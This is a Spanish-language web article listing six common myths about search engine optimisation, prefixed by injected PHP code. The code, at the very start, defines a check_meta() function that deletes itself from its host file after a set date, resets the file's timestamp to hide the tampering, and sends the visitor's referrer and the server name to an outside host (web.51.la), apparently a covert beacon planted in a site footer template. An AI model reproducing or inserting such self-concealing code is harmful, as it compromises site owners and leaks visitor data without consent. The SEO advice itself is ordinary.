check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Mitos sobre SEO

Mito #1: Si construyes un Web site, conseguirás tráfico

Todos los Web site se diseñan para conseguir tráfico. El tráfico es el santo grial del Internet. Sin embargo, puedes tener el mejor sitio, con el mejor diseño y no conseguir a un solo visitante. Hay millones de Web site en Internet. Las probabilidades de que alguien ingrese por casualidad a tu sitio Web son como intentar encontrar una aguja en un pajar. Cada buen negocio necesita del Marketing, los sitios Web no son una excepción. Necesitas registrar y posicionar tu sitio Web en los buscadores donde el tráfico en el Internet te encontrará.

Mito #2: Las compañías de SEO pueden prometer los puestos superiores en los motores de la búsqueda

Nadie puede garantizarte los puestos superiores en los motores de la búsqueda. Si se realiza un buen trabajo, podrás tener buenas chances de conseguir un puesto alto.
Sin embargo, los motores de la búsqueda están cambiando todo el tiempo. También depende de qué tan competitiva sea tu industria y de cuántas búsquedas se realicen para tus palabras claves. Cada compañía de SEO está trabajando con los mismos algoritmos del Buscador y no podemos controlar cómo Google, Yahoo y MSN te Rankee. Lo cierto es, que sin la optimización y una estrategia de linkeo, las probabilidades de conseguir buenos puestos en los buscadores son bastante menores.

Mito #3: Podemos hacer nuestra propia optimización del sitio Web

La mayoría de las compañías no tienen los conocimientos suficientes para hacer su propia optimización. El diseño y la optimización de la Web son dos cosas separadas. Puedes hacer tu propia optimización, sin embargo si no sabes acerca del tema, puede llegar a tomarte varios meses obtener la experiencia y conocimiento suficiente como para realizar un buen trabajo.

Mito #4: Puedo comprar un software que me ayude a hacer la optimización y conseguir ranking de esa manera.

Cada sitio Web es diferente y necesita un enfoque personalizado. El software puede hacer algunos cambios simples, un cierto código pero no puede distinguir entre los sitio Web. Además, las fórmulas del Buscador están cambiando todo el tiempo y es probable que su software sea anticuado en un futuro cercano.

Mito #5: Puedo hacer la optimización una vez y eso es todo lo que necesito.

No exactamente, hay un par de razones para trabajar constantemente en tu optimización. Tu competencia también está trabajando en ella. Puede ser que consigas un alto ranking pero si te sientas cómodamente y te relajas, encontrarás que tu competencia te pasará para arriba. También, los motores de búsqueda están cambiando todo el tiempo, las estrategias que utilizas ahora no te serán útiles en un futuro. Los sitios que son optimizados por única vez casi siempre caen en poco tiempo de la primera página de resultados.

Mito #6: Pongo las meta etiquetas correctas y conseguiré un buen ranking.

Las meta etiquetas son una pequeña parte de un rompecabezas grande. Son importantes pero no son la única cosa que necesitas realizar para mejorar tu ranking. Un buen cambio en las meta etiquetas puede hacer una gran diferencia, pero la mayoría de las veces eso no sucede. No existe una varita mágica que te haga alcanzar la mejor posición dentro de los motores de búsqueda. La respuesta es más bien realizar un conjunto de pequeñas cosas que te harán conseguir un buen ranking. Con eso dicho, hagan sus meta etiquetas, pero no paren allí.

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